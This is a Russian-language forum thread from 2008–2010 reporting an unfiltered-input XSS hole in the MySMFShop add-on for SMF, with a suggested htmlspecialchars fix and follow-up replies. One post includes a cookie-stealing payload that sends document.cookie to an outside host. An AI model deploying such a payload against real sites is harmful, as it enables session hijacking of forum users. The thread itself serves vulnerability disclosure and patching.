myShop позволяет сделать с форумом что угодно!

Jerry · 26 ноября 2008, 20:26:37

Я увидел, что мод SMF Shop не фильтрует содержимое названия и описания товаров.
Это даже хорошо: можно делать форматированные разноцветные названия и описания.
Но для SMF Shop существует дополнение MySMFShop (ссылку я нашел в теме мода на это форуме), позволяющий пользователям закачивать свои файлы в магазин.
И только я попробовал ввести "<script>alert(1);</script>" в описание, увидел то, что можно ожидать...

Дополнение возможности закачки не фильтрует ввод пользователей и позволяет легко украсть cookie пользователей XSS атакой или сделать что угодно еще!

Надобности фильтровать такой ввод кажется столь очевидным, что, кажется, никто и не проверял такие вещи!
Внимание владельцам дополнения! Обязательно добавьте в myshop.php фильтрацию наподобие той, что в Post.php (htmlspecialchars и т.д.)!!!
alert(1); мог быть open('http://mysite123.ru/nnn.php?'+document.cookie);...

Yworld_garry · 26 ноября 2008, 21:55:27

Сказали А, говорите В.
Если вы решили эту проблему, поделитесь с народом, если не жалко.

Jerry · 26 ноября 2008, 22:22:48

До места вставки строки в БД сделайте
htmlspecialchars(stripslashes($_POST['itemname']); htmlspecialchars(stripslashes($_POST['itemdesc']);

Мод вроде такой "официальный" (есть на сайте smf org, у автора мода форум на своем домене, код мода написан со сдвигом и грамотными комментариями), а такой баг...
А можете вообще добавить die('...'); в начало.

supmener · 13 марта 2010, 22:06:31

А сейчас как с этим дела обстоят? Все исправили или по прежнему существует уезвимость?

Yworld_garry · 13 марта 2010, 22:21:12

Дык решение постом выше.

supmener · 13 марта 2010, 22:33:18

Решение писалось полтора года назад

Yworld_garry · 13 марта 2010, 22:36:50

Цитата: supmener от 13 марта 2010, 22:33:18
Решение писалось полтора года назад

От этого оно не стало хуже, мод не менялся с тех пор, если он вообще доступен.

Остался у коллекционеров.

supmener · 13 марта 2010, 22:57:09

Благодарю за ответ.